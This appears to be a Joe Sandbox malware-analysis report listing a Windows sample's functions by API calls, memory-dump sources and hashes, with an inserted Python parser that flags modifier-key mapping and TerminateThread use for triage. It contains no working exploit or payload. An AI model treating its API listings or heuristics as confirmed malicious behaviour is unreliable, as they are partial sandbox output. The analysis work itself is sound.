                                                                                                                    • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                    • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                    • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                    APIs
                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                    • SendMessageW.USER32 ref: 00471AE3
                                                                                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3611059338-0
                                                                                                                    • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                    • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                    • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                    • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1640429340-0
                                                                                                                    • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                    • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                    • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                    • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • _wcslen.LIBCMT ref: 004438CD
                                                                                                                    • _wcslen.LIBCMT ref: 004438E6
                                                                                                                    • _wcstok.LIBCMT ref: 004438F8
                                                                                                                    • _wcslen.LIBCMT ref: 0044390C
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                    • _wcstok.LIBCMT ref: 00443931
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3632110297-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 752480666-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3275902921-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3275902921-0
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32 ref: 004555C7
                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3691411573-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                    • EndPath.GDI32(?), ref: 004472D6
                                                                                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 372113273-0
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    APIs
                                                                                                                    • __getptd.LIBCMT ref: 0041708E
                                                                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                    • __lock.LIBCMT ref: 004170BE
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                    • _free.LIBCMT ref: 004170EE
                                                                                                                    • InterlockedIncrement.KERNEL32(03072D00), ref: 00417106
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3470314060-0
                                                                                                                    • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                    • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3495660284-0
                                                                                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                    APIs
                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
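Records like the two above (the InterlockedExchange/TerminateThread routine and the six MapVirtualKeyW calls) are far easier to triage in bulk once they are parsed rather than read one by one. The following parser is an added example for this page, not Joe Sandbox tooling and not code from the sample: its grammar for the APIs / Memory Dump Source / Similarity blocks is inferred from the layout shown here (an assumption), and its two triage rules are analyst heuristics, not Joe Sandbox signatures. The heuristics flag MapVirtualKeyW being called on the modifier virtual-key codes seen above (0x10 VK_SHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN, 0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, the documented Windows values) and any direct use of TerminateThread. The "Download File" suffix on Associated lines is viewer link text and is stripped. The embedded input is constructed from the two records above.

```python
"""Parse Joe Sandbox function records (APIs / Memory Dump Source / Similarity
blocks) into structured data and run two analyst triage heuristics. Added
example for this page, not Joe Sandbox tooling: the record grammar is inferred
from the blocks on the page and the heuristics are assumptions."""
import re
from dataclasses import dataclass, field

BULLET, LINK_RESIDUE = "•", "Download File"  # residue: viewer link text on .sdmp names
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
MODIFIER_VKS = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",  # documented
                0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}  # Windows VK_* codes
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"; nested calls are
# prefixed with "Part of subcall function ADDR: ".
_API_LINE = re.compile(r"^(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+): )?"
                       r"(?P<name>[A-Za-z_][\w@$]*)\.(?P<module>[A-Za-z0-9_]+)"
                       r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                       # int for hex literals, None for "?" (unresolved)
    ref: int                         # call-site address
    subcall_of: "int | None" = None  # enclosing subcall function for nested calls

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # Source File, Associated, API ID, hashes

    @property
    def direct_calls(self):
        return [c for c in self.calls if c.subcall_of is None]

def _parse_args(text):
    toks = [t.strip() for t in (text or "").split(",") if t.strip()]
    return [None if t == "?" else int(t, 16) if re.fullmatch(r"[0-9A-Fa-f]+", t) else t
            for t in toks]

def parse_records(text):
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                      # every record starts with this heading
            rec, section = FunctionRecord(), "APIs"
            records.append(rec)
        elif rec is None or not line:
            continue
        elif line in SECTIONS:
            section = line
        elif section == "Strings":
            continue                            # string xrefs are not needed for triage
        elif section == "APIs":
            m = _API_LINE.match(line.lstrip(BULLET).strip())
            if m:
                rec.calls.append(ApiCall(m["name"], m["module"], _parse_args(m["args"]),
                                         int(m["ref"], 16),
                                         int(m["subfn"], 16) if m["subfn"] else None))
        else:                                   # "Key: value" metadata lines
            key, _, value = line.lstrip(BULLET).strip().partition(":")
            value = value.strip()
            if value.endswith(LINK_RESIDUE):
                value = value[:-len(LINK_RESIDUE)].rstrip()
            if key == "Associated":             # repeats once per extra memory dump
                rec.fields.setdefault(key, []).append(value)
            else:
                rec.fields[key] = value
    return records

def triage(rec):  # analyst heuristics (assumptions, not Joe Sandbox signatures)
    findings = []
    vks = sorted({c.args[0] for c in rec.direct_calls if c.name == "MapVirtualKeyW"
                  and c.args and c.args[0] in MODIFIER_VKS})
    if vks:
        findings.append("maps modifier keys to scan codes: "
                        + ", ".join(MODIFIER_VKS[v] for v in vks))
    if any(c.name == "TerminateThread" for c in rec.direct_calls):
        findings.append("kills a thread with TerminateThread (no cleanup runs)")
    return findings

# Constructed input: the two records above with the page indentation removed and
# trimmed to one Associated line; not copied from a live report.
SAMPLE = """\
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 0044B655
• EnterCriticalSection.KERNEL32(?), ref: 0044B666
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
• LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
Memory Dump Source
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• API String ID: 3495660284-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
Similarity
• API String ID: 4278518827-0
"""
```

Feeding a whole report's function section through `parse_records` and printing `rec.fields["API String ID"]` next to `triage(rec)` gives a quick list of which routines deserve a closer look in the disassembly; the API String ID and fuzzy-hash fields are kept so the same records can be matched against other reports.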
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 442100245-0
                                                                                                                    • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                    • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                    • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                    • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                    • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                    • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 621800784-4108050209
                                                                                                                    • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                    • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                    • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                    • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
